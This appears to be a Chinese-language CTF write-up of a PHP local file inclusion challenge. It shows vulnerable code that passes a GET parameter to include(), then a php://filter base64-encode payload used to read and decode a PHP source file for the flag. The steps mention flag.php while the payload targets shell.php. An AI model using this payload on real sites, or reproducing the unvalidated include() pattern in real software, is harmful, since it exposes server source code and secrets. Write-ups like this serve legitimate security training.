一、访问网站

Pasted image 20250407173644.png

二、分析代码

<html>  
<title>Here's a secret. Can you find it?</title>  
<?php  
  
if(isset($_GET['file'])){    $file = $_GET['file'];  
    include($file);  
}else{    highlight_file(__FILE__);  
}  
?>  
</html>

分析发现，只是很普通的文件包含

三、尝试访问flag.php文件

发现报错
Pasted image 20250407174236.png

四、尝试使用php伪协议

使用filter进行base64加密获取flag.php

file=php://filter/read=convert.base64-encode/resource=shell.php

Pasted image 20250407174505.png

五、进行解码

成功获取flag
Pasted image 20250407174538.png

总结

php伪协议
使用filter伪协议进行base64加密获取flag

发送评论编辑评论

一、访问网站

二、分析代码

三、尝试访问flag.php文件

四、尝试使用php伪协议

五、进行解码

总结

发送评论 编辑评论

推荐文章

发送评论编辑评论